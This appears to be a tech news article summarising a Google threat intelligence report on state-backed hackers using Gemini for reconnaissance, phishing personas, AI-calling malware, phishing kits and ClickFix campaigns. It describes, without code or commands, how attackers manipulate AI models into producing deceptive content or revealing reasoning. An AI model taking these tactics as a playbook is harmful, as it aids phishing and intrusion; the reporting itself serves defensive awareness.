State-Sponsored Cyber Warfare: The AI Advantage

State-Sponsored Hackers Exploiting AI for Cyberattacks

Government-backed hackers from countries like Iran, North Korea, China, and Russia are leveraging artificial intelligence to enhance cyberattacks. According to a recent report from Google’s Threat Intelligence Group (GTIG), threat actors are using models such as Google’s Gemini to create sophisticated phishing campaigns and develop malware.

The quarterly AI Threat Tracker report, released by Google today, highlights how state-sponsored attackers have incorporated AI into every stage of their attacks, resulting in increased efficiency in reconnaissance, social engineering, and malware development during the last quarter of 2025.

GTIG researchers stated in the report that “large language models have become indispensable tools for technical research, targeting, and the swift generation of sophisticated phishing tactics” for government-backed threat actors.

State-Sponsored Hackers’ AI-Powered Reconnaissance Efforts

APT42, an Iranian threat actor, utilized Gemini to enhance reconnaissance and targeted social engineering activities. By inputting a target’s biography into Gemini, APT42 created personas and scenarios to engage targets effectively. The group also used AI for language translation and comprehension, enabling them to bypass traditional phishing detection methods.

On the other hand, North Korean actor UNC2970 focused on defense targeting and used Gemini to gather intelligence on high-value targets in the cybersecurity and defense sectors. By leveraging AI, the group aimed to create tailored phishing personas successfully.

Surge in Model Extraction Attacks

Google DeepMind and GTIG identified an increase in model extraction attempts, also known as “distillation attacks,” aimed at stealing intellectual property from AI models. These attacks targeted Gemini’s reasoning capabilities by coercing the model to output full reasoning processes.

Although GTIG did not observe direct attacks on advanced AI models by persistent threat actors, they noted frequent model extraction attempts by private sector entities and researchers seeking to replicate proprietary logic.

Emergence of AI-Integrated Malware

GTIG uncovered malware samples, known as HONESTCUE, utilizing Gemini’s API to generate functionality. This malware aims to evade traditional detection methods through multi-layered obfuscation techniques.

Additionally, GTIG identified COINBAIT, a phishing kit likely accelerated by AI code generation tools, posing as a major cryptocurrency exchange for credential harvesting.

ClickFix Campaigns Exploiting AI Chat Platforms

In a unique social engineering campaign observed in December 2025, threat actors abused generative AI services to distribute ATOMIC malware targeting macOS systems. By manipulating AI models to create deceptive content, attackers hosted malicious command-line scripts using trusted domains.

Underground Marketplace Utilizing Stolen API Keys

GTIG found a persistent demand for AI-enabled tools in underground forums, with cybercriminals resorting to stolen API keys to access commercial AI products. One toolkit, Xanthorox, advertised as custom AI, was actually powered by commercial AI products like Gemini accessed through stolen credentials.

Google’s Response and Mitigations

Google has taken action against malicious actors by disabling accounts associated with malicious activity. The company continues to enhance its models to prevent misuse and disrupt attacks effectively.

GTIG emphasized that despite advancements in AI capabilities, no actors have fundamentally altered the threat landscape. The report underscores the growing role of AI in cybersecurity and the need for enhanced defense strategies against AI-augmented attacks.

(Image by SCARECROW artworks)

Want to learn more about AI and big data from industry leaders? Check out AI & Big Data Expo for upcoming events in Amsterdam, California, and London.

AI News is powered by TechForge Media. Explore other enterprise technology events and webinars here.